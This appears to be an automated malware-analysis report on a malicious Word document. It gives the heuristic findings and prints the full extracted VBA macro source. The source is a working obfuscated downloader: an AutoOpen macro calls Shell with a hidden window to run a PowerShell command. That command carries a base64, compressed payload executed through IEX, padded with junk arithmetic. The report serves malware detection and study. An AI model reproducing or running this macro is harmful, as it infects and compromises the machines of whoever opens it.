MALICIOUS
150
Risk Score
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968) uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA) ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub Autoopen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10650 bytes |
SHA-256: a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tdFNRaQVsjio" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function uibHIc() On Error Resume Next YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji zisoU = CSng(56708 * CInt(51425) + 47295 - 4207) PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968) uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA) ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648) End Function Sub Autoopen() On Error Resume Next GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088) uibHIc waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589) End Sub Attribute VB_Name = "ftjTiBnQtVNMKJ" Function JiHJpfwpl() On Error Resume Next GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975) RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ" IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454) OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg" kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009) dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA" RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142) jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6" TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351) HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg" CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107) juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU" AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276) sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw" JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ End Function Function waotA() On Error Resume Next Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888) DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA" BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621) dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA" HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318) zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg" SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214) hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV" EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185) oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI" Qcbutn = 22775 + Log(19563) - tdwoO / Atn(72292) / Ciiiv / aKJXEW czPRW = CSng(54037 * CInt(68450) + 26367 - 614) GLcbiBSXQP = "AOQA4AE0A" + "cgBnAEk" + "ASwBrAHMAdgBQAH" + "IAegA1AHgATQ" TwYjwd = 54397 + Log(11491) - KRXfDi / Atn(4006) / BQkVip / kwNjRm BCqKj = CSng(43280 * CInt(6165) + 54045 - 64405) YGnZa = "ArADEA" + "dQB" + "QADEAOABlADM" + "ATgAzAEYAN" + "gBYAEIAMQArA" + "FgAaQBOA" + "DA" RKLDES = 22282 + Log(74855) - whzPS / Atn(71029) / jwCPv / HIQUot faZjDD = CSng(47611 * CInt(56912) + 73448 - 60382) iBPkl = "ATwBo" + "AC8AUA" + "BpAGgAOQBKAD" + "cAegB0A" CtwoUE = 74033 + Log(46174) - XnEZS / Atn(72589) / CDmjdS / pXIOMP fzTYN = CSng(4087 * CInt(84441) + 36939 - 77506) rHdUlwKFsh = "GYAZABKAE" + "EAbABmAHUAd" + "wBJAE4AdQB" + "NAEsAcwBuAG8" + "AWAAyAHQATwA4" waotA = DQQVlUzJkUJ + dzHiidcVtqU + zItaivYNiiX + hUPPifK + oVRiWa + GLcbiBSXQP + YGnZa + iBPkl + rHdUlwKFsh End Function Function PIuhQC() On Error Resume Next iQTbs = 43134 + Log(179) - RZWaz / Atn(91199) / jFHRL / aINspk EjljP = CSng(51706 * CInt(2867) + 25226 - 97683) wzwClYKNqwo = "AFYAdgA" + "0ADUAbwBFAFI" + "AdABvADUAZ" + "ABoADIASAA5" + "AGU" + "AYwB" + "xAGUASg" + "BMA" + "DQAawBoA" + "HIAcQBFAHoAKwB" wBIwu = 79278 + Log(80345) - wYYdw / Atn(70130) / cWIHF / ClzMho KYtnls = CSng(20634 * CInt(30850) + 6688 - 86692) HwlUawhj = "3AGcAMwBGA" + "FgANwBUAHkAUgBC" + "AFYANQB4AE4AT" + "ABvA" + "EEAMQBYA" + "E0AawB" + "IAGYAYQBLAEUA" + "ZwBYAG8AcgB" + "uAE8AR" TXmrMc = 53171 + Log(74600) - hmEtF / Atn(86244) / uPJkMA / uZikr ZmZcc = CSng(77173 * CInt(65687) + 92365 - 20691) toUwiCRTvu = "ABhAG0" + "AMwB4AH" + "cAQQA0AGcA" + "Mw" + "AzAGIAVQ" + "BWAE4AVABO" + "AEEAZABk" + "ADAAMABCADQAaQB" + "yADkAbwBEAFQ" + "AT" WkvnG = 46369 + Log(37427) - hsNQA / Atn(89139) / SSVsS / sjibuN QRKijq = CSng(74827 * CInt(283) + 34245 - 25482) zZzsBka = "AA3A" + "FQASgByAGk" + "ARgBNAEU" + "AeABBA" + "G0AMAB" WGdCzq = 17526 + Log(71918) - UKVMDs / Atn(81946) / ANMLKr / QhfhKH AFYWL = CSng(9670 * CInt(79956) + 69342 - 83452) aRQOVPN = "hAEMAa" + "ABPAHMASQBvA" + "HYAaABxAEUAd" + "QBNAG0" + "ANgB0AFUAb" + "gBMA" + "EEAdwB0ADgAa" JiHFw = 95762 + Log(58946) - zIzEBl / Atn(22649) / smRKb / XMJPnh loQVuB = CSng(53246 * CInt(69648) + 58854 - 39738) RsjpO = "QBOAEoANAB" + "SAF" + "QAbQB0AHUARABo" + "AGcAYQBPADgAc" + "wB" + "PAHcARwA" BqKwIv = 8717 + Log(76532) - zMDSj / Atn(81453) / LuwjJz / OUijH kiORiJ = CSng(71724 * CInt(31549) + 47744 - 6627) VlizSTVA = "0AEM" + "AWAA2" + "AHA" + "AcQBwAHgAZQ" + "B2AHkAZgB4AG8AQ" LAWjZ = 70803 + Log(97625) - DTQpio / Atn(50079) / jwdaM / EaSzmk FSmri = CSng(40669 * CInt(18580) + 51402 - 51475) IQKSSuhRo = "QByAD" + "kAdABoAF" + "MAYwBLAF" + "oATQBxAHkAMw" + "BWAEUAMwB2AD" + "IARA" + "BC" + "AEMAKwBMADk" + "AawBq" + "AGwAYgBWAD" PIuhQC = wzwClYKNqwo + HwlUawhj + toUwiCRTvu + zZzsBka + aRQOVPN + RsjpO + VlizSTVA + IQKSSuhRo End Function Function DhiBaAHqKdt() On Error Resume Next jjuDQT = 79151 + Log(61318) - IFETuc / Atn(2260) / vwQbw / SwAdz TQdFH = CSng(88640 * CInt(82795) + 35633 - 88594) razwsUSXkz = "EAN" + "QBVAE0" + "AVwA0" + "AFY" GdRJbR = 313 + Log(96674) - OhHNiK / Atn(24583) / UcEPqr / JrczLA iTIpmJ = CSng(79738 * CInt(74534) + 1832 - 96987) RvhrFbRD = "AKwBmAEwAU" + "gBlADQAS" + "AByAEsASAArAD" + "MAYQAvAHEAUw" + "BzAGoAWQB" + "pAEgALwBT" + "AE" + "IANg" + "BuAG0ANAB" ljTLC = 97388 + Log(91233) - IWqpYP / Atn(73713) / zkoAmq / wnFoXC ibGMEI = CSng(24212 * CInt(96264) + 78923 - 57956) TNKmLlSNFc = "0AEYARwBFAG8" + "ARgBuAFIA" + "ZQAw" + "AEIAUABHAF" + "IASABkAGUA" + "awBUAFIAawBHAHU" + "AdAA4AFoAVQB" + "WAGsAeAB" + "YAFYAOQAwADkATg" + "AxADQAUg" QrPsi = 68939 + Log(49823) - XqCMz / Atn(31374) / GUXwKY / NoPiLL ZBvKzV = CSng(98060 * CInt(25668) + 12052 - 18210) VvalJtDjt = "BKACsAbwAy" + "AGQA" + "TABsAGoANwBiAE" + "8AZgArAGoAdAA" + "5ADEAVgBl" + "AD" + "AAKwB5AE0A" OWiFf = 27946 + Log(16995) - KBrasU / Atn(60832) / ibcvY / WwoHC uvsOO = CSng(52202 * CInt(91255) + 3023 - 25833) wClbolr = "cQB0A" + "GwAUABsAC8AawB1" + "AHIALwBKADEATQ" + "BRA" + "HUAagBhAH" + "cASAB0AEsATAA" + "xAGkAZwBSA" + "FgAKwB5ADgA" IAaOB = 54749 + Log(64621) - DqRzUl / Atn(56539) / zzAjQ / MIBOI LQYiKW = CSng(36388 * CInt(53979) + 41244 - 18795) fJjMzfdB = "RgBCADQ" + "AU" + "gBtAHQ" + "AUgBYAE4A" + "ZQByADYAW" + "QBLA" + "EcAKwA2AHMAOABF" tQNDM = 67414 + Log(95473) - HkAdvB / Atn(63082) / joRMmT / PmRnm TBsnmG = CSng(30632 * CInt(6074) + 39507 - 99903) zVJAjtFu = "AHg" + "AdQBXAFAAYwA1A" + "FAAUgBuAHQAV" + "ABYAG" + "sAOABuAGY" + "ANABCACcA" + "KQAgACw" + "AIABbAFMAWQ" + "BTAHQAZQB" + "NAC" EmBsL = 75191 + Log(55759) - ijinDw / Atn(51864) / MwRuvL / ojHqJu nPosI = CSng(99830 * CInt(34467) + 21996 - 8207) lWPjjmQqj = "4AaQ" + "BvAC4AQwBPAE0A" + "UABSAEUAcw" + "BTAGkAbwBOAC4AQ" + "wBPAG0AcAByA" oKHRkN = 78424 + Log(82065) - jDFCF / Atn(56942) / INIDwT / NsTwLo IBtSGl = CSng(6877 * CInt(24763) + 7565 - 41805) QREzuXGrkj = "GUAUwBTAEkA" + "TwBuA" + "E0AbwBEAGUAX" + "QA6ADoARABFAGM" + "ATwBN" + "AFA" + "AcgBFA" + "HMAUwApA" + "HwAIA" DhiBaAHqKdt = razwsUSXkz + RvhrFbRD + TNKmLlSNFc + VvalJtDjt + wClbolr + fJjMzfdB + zVJAjtFu + lWPjjmQqj + QREzuXGrkj End Function Function wjcaHrlizD() On Error Resume Next zwONi = 24235 + Log(68003) - QrECA / Atn(4564) / cuYQP / CkXCLk spvJnk = CSng(94550 * CInt(40803) + 36359 - 99411) PwqkGFkZdsj = "BmAE8AcgBlA" + "GEAQwBIAC0" + "AbwBCAEoARQBDA" + "FQAew" + "AgAG4AZQBXAC0Ab" + "wBCAEoA" + "ZQBDAFQAIABJAG8" GPwYj = 7934 + Log(97596) - QkIIon / Atn(12606) / zOrLXc / WavuPQ zJuPJ = CSng(99654 * CInt(63178) + 58563 - 417) WAivCj = "ALgBzAH" + "QAcgB" + "lAEEATQByAG" + "UAQ" + "QB" + "EAE" + "UAcgAo" DSUOk = 61831 + Log(15088) - juAHb / Atn(77096) / ifazoJ / cKlwOY GISNXI = CSng(10390 * CInt(15540) + 41698 - 72929) MJzzI = "ACAAJABf" + "AC" + "wAWwBUAGUAeABU" + "AC4ARQ" + "BOAGMA" + "TwBkAGkATgBHAF0" nXiWFs = 65605 + Log(13167) - fUGhLJ / Atn(38065) / JdmSis / lhtEf WJoCBl = CSng(1659 * CInt(10606) + 11185 - 85103) tuAfZQG = "AOgA6A" + "EEAcwBjAEkASQAg" + "ACkAfQAgACkALgB" + "yAGUAQQBkAFQ" + "ATwBFAG4AZA" + "AoACAA" + "KQB" HvwmC = 71768 + Log(4576) - oPwsz / Atn(55134) / iIlXz / bwIKSf YSkDl = CSng(42100 * CInt(21100) + 75555 - 89520) XCjqf = "8ACYAIAAoACAA" + "JABlAG4AdgA" + "6AGMAbwBNAFMAUA" + "BlAGMAWwA0ACw" + "AMQA1ACwAMgA" + "1AF0ALQB" + "KAG8ASQB" + "OACcAJwAp" jwqqrR = 45558 + Log(33128) - ZwGsUi / Atn(85440) / jzpbkG / pVivHd RkUBb = CSng(17664 * CInt(74459) + 69013 - 59706) zUDVai = "AA==" wjcaHrlizD = PwqkGFkZdsj + WAivCj + MJzzI + tuAfZQG + XCjqf + zUDVai End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.